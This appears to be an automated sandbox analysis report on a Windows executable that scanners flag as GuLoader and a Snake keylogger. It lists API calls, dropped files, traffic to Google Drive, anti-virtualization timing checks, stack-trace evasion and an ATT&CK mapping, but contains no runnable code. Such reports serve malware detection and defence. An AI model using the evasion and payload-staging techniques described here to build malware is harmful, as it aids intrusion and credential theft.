      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49805 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49886 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:49968 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50014 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50016 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50018 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50020 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:50021 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50022 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50024 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.4:50026 version: TLS 1.2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_0040573B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040573B
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 4_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403552
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Windows\Fonts\frostluftenJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Windows\Fonts\frostluften\MangrateJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00406DE60_2_00406DE6
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004075BD0_2_004075BD
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_6FC41BFF0_2_6FC41BFF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 4_2_00406DE64_2_00406DE6
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 4_2_004075BD4_2_004075BD
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: String function: 00402DCB appears 51 times
      Source: QNuQ5e175D.exeStatic PE information: invalid certificate
      Source: QNuQ5e175D.exe, 00000000.00000002.1943239076.0000000000468000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exe, 00000004.00000000.1941328097.0000000000468000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exeBinary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.evad.winEXE@3/5@2/2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 4_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403552
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004049E7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049E7
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Users\user\AppData\Local\skattekodeJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Users\user\AppData\Local\Temp\nsd38FF.tmpJump to behavior
      Source: QNuQ5e175D.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: QNuQ5e175D.exeReversingLabs: Detection: 44%
      Source: QNuQ5e175D.exeVirustotal: Detection: 63%
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile read: C:\Users\user\Desktop\QNuQ5e175D.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"Jump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: QNuQ5e175D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000004.00000002.3567436763.00000000017EC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1944070834.000000000456C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_6FC41BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FC41BFF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_6FC430C0 push eax; ret 0_2_6FC430EE
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI/Special instruction interceptor: Address: 4C06ED2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI/Special instruction interceptor: Address: 1E86ED2
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeRDTSC instruction interceptor: First address: 4BD9B1D second address: 4BD9B1D instructions: 0x00000000 rdtsc 0x00000002 test bl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FB628C8B858h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeRDTSC instruction interceptor: First address: 1E59B1D second address: 1E59B1D instructions: 0x00000000 rdtsc 0x00000002 test bl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FB628C0C758h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe TID: 7780Thread sleep time: -90000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 4_2_00402930 FindFirstFileW,4_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 4_2_004068D4 FindFirstFileW,FindClose,4_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 4_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405C83
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.0000000003994000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI call chain: ExitProcess graph end nodegraph_0-4192
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI call chain: ExitProcess graph end nodegraph_0-4195
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_6FC41BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FC41BFF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"Jump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      QNuQ5e175D.exe45%ReversingLabsWin32.Spyware.Snakekeylogger
      QNuQ5e175D.exe64%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsk3C2D.tmp\System.dll0%VirustotalBrowse

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		142.250.184.206
      		truefalse
        		high
        drive.usercontent.google.com
        		172.217.16.193
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comQNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://drive.google.com/BA90920B1QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://translate.google.com/translate_a/element.jsQNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.1996475565.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
